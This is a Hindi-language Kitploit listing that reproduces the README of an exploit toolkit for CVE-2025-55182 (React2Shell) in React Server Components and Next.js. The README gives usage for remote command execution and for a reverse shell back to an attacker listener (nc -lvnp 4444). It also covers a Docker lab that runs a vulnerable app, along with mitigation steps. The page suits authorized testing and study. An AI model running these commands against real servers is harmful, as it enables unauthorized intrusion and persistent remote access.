Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182 — react2Shell Next.js RCE के माध्यम से सत्यापित करने, शोषण करने और इंटरैक्टिव शेल प्राप्त करने के लिए एक सरल टूलकिट। | Kitploit
उपकरण/GitHubGitHub/j4ck3lsyn-gen2/cve-2025-55182
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubj4ck3lsyn-gen2/cve-2025-55182

CVE-2025-55182

react2Shell Next.js RCE के माध्यम से सत्यापित करने, शोषण करने और इंटरैक्टिव शेल प्राप्त करने के लिए एक सरल टूलकिट।

रिपॉजिटरी देखें
35 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182: React2Shell - Next.js रिमोट कोड निष्पादन टूलकिट

CVE-2025-55182 CVSS License

[!WARNING] यह टूल केवल अधिकृत परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। अनधिकृत नेटवर्क एक्सेस और डेटा एक्सफ़िल्ट्रेशन अवैध है। किसी भी नेटवर्क पर इस टूल का उपयोग करने से पहले उपयोगकर्ताओं को यह सुनिश्चित करना आवश्यक है कि उनके पास उचित प्राधिकरण हो।

अवलोकन

इस रिपॉजिटरी में CVE-2025-55182, जिसे React2Shell के नाम से भी जाना जाता है, के माध्यम से सत्यापन, शोषण और इंटरैक्टिव शेल प्राप्त करने के लिए एक सरल टूलकिट शामिल है। यह React Server Components (RSC) में एक गंभीर प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन (RCE) भेद्यता है, जो संस्करण 19.0.0, 19.1.0, 19.1.1 और 19.2.0 को प्रभावित करती है।

यह भेद्यता React के Flight प्रोटोकॉल में असुरक्षित डिसीरियलाइज़ेशन के कारण उत्पन्न होती है, जो बिना प्रमाणीकरण के हमलावरों को कमजोर सर्वरों पर मनमाना कोड निष्पादित करने की अनुमति देती है। इसे 3 दिसंबर, 2025 को सार्वजनिक किया गया था और इसका CVSS स्कोर 10.0 (क्रिटिकल) है। यह मुख्य रूप से React Server Components को प्रभावित करती है, लेकिन RSC का उपयोग करने वाले Next.js जैसे फ्रेमवर्क पर भी इसका प्रभाव पड़ता है।

नोट: यह टूलकिट केवल शैक्षिक और शोध उद्देश्यों के लिए है। भेद्यताओं का अनधिकृत शोषण अवैध और अनैतिक है। जिम्मेदारी से उपयोग करें और केवल उन्हीं सिस्टम पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की स्पष्ट अनुमति आपके पास है।

प्रभावित घटक

  • React Server Components: संस्करण 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • संबंधित फ्रेमवर्क: Next.js (कुछ संदर्भों में संभावित रूप से CVE-2025-66478 के माध्यम से)
  • शोषण वेक्टर: RSC पेलोड में असुरक्षित डिसीरियलाइज़ेशन, जो बिना प्रमाणीकरण के RCE सक्षम बनाता है।

अधिक विवरण के लिए, आधिकारिक एडवाइज़री देखें:

  • NVD CVE-2025-55182
  • React सुरक्षा एडवाइज़री
  • React2Shell पर Wiz ब्लॉग

उपयोग


विशेषताएँ

  • सत्यापन: जाँचें कि क्या कोई टारगेट CVE-2025-55182 के प्रति कमजोर है।
  • शोषण: मनमाने कमांड निष्पादित करने के लिए पेलोड तैयार करें।
  • इंटरैक्टिव शेल: स्थायी पहुंच के लिए रिवर्स शेल प्राप्त करें।
  • न्यूनतम निर्भरताओं के साथ Python 3.x का समर्थन करता है।

आवश्यकताएँ

  • Python 3.8+
  • आवश्यक लाइब्रेरी: requests, argparse (pip install -r requirements.txt के माध्यम से इंस्टॉल करें)

इंस्टॉलेशन

Venv इंस्टॉल

  1. रिपो क्लोन करें
root@kitploit:~
git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
cd CVE-2025-55182
  1. वर्चुअल एनवायरनमेंट
root@kitploit:~
python3 -m venv CVE202555182Venv
python3 -m pip install -r requirements.txt
  1. सक्रिय करें
root@kitploit:~
source CVE202555182Venv/bin/activate[.fish]

लोकल इंस्टॉलेशन

  1. रिपॉजिटरी क्लोन करें:
    root@kitploit:~
    git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. निर्भरताएँ इंस्टॉल करें:
    root@kitploit:~
    pip install -r requirements.txt
    

उपयोग

मुख्य स्क्रिप्ट sploit.py है। इसे निम्नलिखित विकल्पों के साथ चलाएँ:

root@kitploit:~
python sploit.py --help

विकल्प

  • --target <URL>: टारगेट URL (जैसे, http://vulnerable-site.com)।
  • --mode <validate|sploit|shell>: ऑपरेशन मोड।
    • validate: बिना शोषण के भेद्यता की जाँच करें।
    • sploit: कस्टम कमांड निष्पादित करें।
    • shell: एक इंटरैक्टिव रिवर्स शेल स्थापित करें।
  • --command <CMD>: निष्पादित करने के लिए कमांड (sploit मोड के लिए आवश्यक)।
  • --lhost <IP>: रिवर्स शेल के लिए लोकल होस्ट (shell मोड के लिए आवश्यक)।
  • --lport <PORT>: रिवर्स शेल के लिए लोकल पोर्ट (डिफ़ॉल्ट: 4444)।

उदाहरण

  1. भेद्यता सत्यापित करें:

    root@kitploit:~
    python sploit.py --target http://example.com --mode validate
    
  2. कमांड निष्पादन के साथ शोषण:

    root@kitploit:~
    python sploit.py --target http://example.com --mode sploit --command "whoami"
    
  3. इंटरैक्टिव शेल प्राप्त करें: सबसे पहले, एक लिसनर सेट करें (जैसे, nc -lvnp 4444), फिर:

    root@kitploit:~
    python sploit.py --target http://example.com --mode shell --lhost 192.168.1.100 --lport 4444
    

यह कैसे काम करता है

  1. भेद्यता का पता लगाना: डिसीरियलाइज़ेशन दोषों का पता लगाने के लिए एक विशेष रूप से तैयार किया गया RSC पेलोड भेजता है।
  2. पेलोड निर्माण: React के Flight प्रोटोकॉल के माध्यम से कोड इंजेक्ट करने के लिए असुरक्षित डिसीरियलाइज़ेशन का उपयोग करता है।
  3. शेल एक्सेस: एक ऐसा पेलोड निष्पादित करके रिवर्स शेल तक पहुंच बनाता है जो हमलावर की मशीन से वापस कनेक्ट होता है।

गहन तकनीकी विश्लेषण के लिए:

  • Datadog Security Labs विश्लेषण
  • Dynatrace ब्लॉग

निष्पादन उदाहरण


Docker इंस्टॉलेशन

root@kitploit:~

{
  "dependencies": {
    "next": "14.3.0-canary.77",
    "react": "19.0.0",
    "react-dom": "19.0.0"
  },
  "scripts": {
    "dev": "next dev",
    "build": "next build",
    "start": "next start"
  }
}

tsconfig.json को पूरी तरह से हटा दें (यही वह मुख्य कारण है जो बिल्ड को तोड़ रहा था)

root@kitploit:~

rm tsconfig.json

न्यूनतम आवश्यक App Router फ़ाइलें बनाएँ

root@kitploit:~

mkdir -p app

# app/layout.tsx
cat > app/layout.tsx << 'EOF'
import "./globals.css";

export default function RootLayout({
  children,
}: {
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body>{children}</body>
    </html>
  );
}

app/globals.css (मूल रूप से खाली हो सकता है)

root@kitploit:~
echo "/* minimal css - required by Next.js */" > app/globals.css

app/page.tsx (आपका वास्तविक कमजोर पेज यहाँ जाता है – उदाहरण स्टब)

root@kitploit:~
cat > app/page.tsx << 'EOF'
export default function Home() {
  return (
    <main>
      <h1>react2shell lab is running!</h1>
      <p>Start sploiting → /api/vulnerable-endpoint</p>
    </main>
  );
}

अंतिम बुलेटप्रूफ Dockerfile बनाएँ (सटीक सामग्री)

root@kitploit:~

FROM node:20-alpine

WORKDIR /app

# Copy only package files first (better caching)
COPY package*.json ./

# Install dependencies with legacy peer deps (required for this old canary)
RUN npm install --legacy-peer-deps

# Copy the rest of the app
COPY . .

# Remove tsconfig.json so Next.js doesn't try to auto-install TypeScript (this was the killer)
RUN rm -f tsconfig.json

# Build the Next.js app
RUN npm run build

# Expose port
EXPOSE 3000

# Start the app
CMD ["npm", "start"]

बिल्ड और रन करें (ये कमांड अब पूरी तरह से काम करते हैं)

root@kitploit:~

docker build -t react2shell .
docker run -d -p 3000:3000 --name react2shell react2shell

ब्राउज़र में खोलें

→ http://localhost:3000आपका काम हो गया। कंटेनर <2 सेकंड में शुरू हो जाता है और प्रोटोटाइप पॉल्यूशन → RCE चेन के लिए तैयार है।वैकल्पिक वन-लाइनर कभी भी सब कुछ मिटाकर रीस्टार्ट करने के लिए:bash

root@kitploit:~
docker rm -f react2shell && docker run -d -p 3000:3000 --name react2shell react2shell

शमन

  • React को संस्करण 19.2.1 या उसके बाद के संस्करण में अपडेट करें।
  • यदि आवश्यक न हो तो React Server Components को अक्षम या प्रतिबंधित करें।
  • शोषण के प्रयासों पर नज़र रखें, क्योंकि राज्य-प्रायोजित अभिनेता (जैसे, China-nexus समूह) इस CVE को तेजी से निशाना बनाते हुए देखे गए हैं।

खतरे की खुफिया जानकारी के लिए AWS Security ब्लॉग देखें।

अस्वीकरण

यह टूल बिना किसी वारंटी के "जैसा है" प्रदान किया गया है। इस टूलकिट के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए लेखक जिम्मेदार नहीं है। भेद्यताओं का परीक्षण करने से पहले हमेशा अनुमति प्राप्त करें।

योगदान

पुल रिक्वेस्ट का स्वागत है! बड़े बदलावों के लिए, कृपया पहले एक issue खोलें।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के तहत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।

संदर्भ

  • Cisco एडवाइज़री
  • Palo Alto Unit 42 रिपोर्ट
  • CMU ISO समाचार
  • Cloudflare ब्लॉग
  • Huntress ब्लॉग
  • JFrog ब्लॉग
  • Elastic Security
Your Image Badge
टूल डाउनलोड करें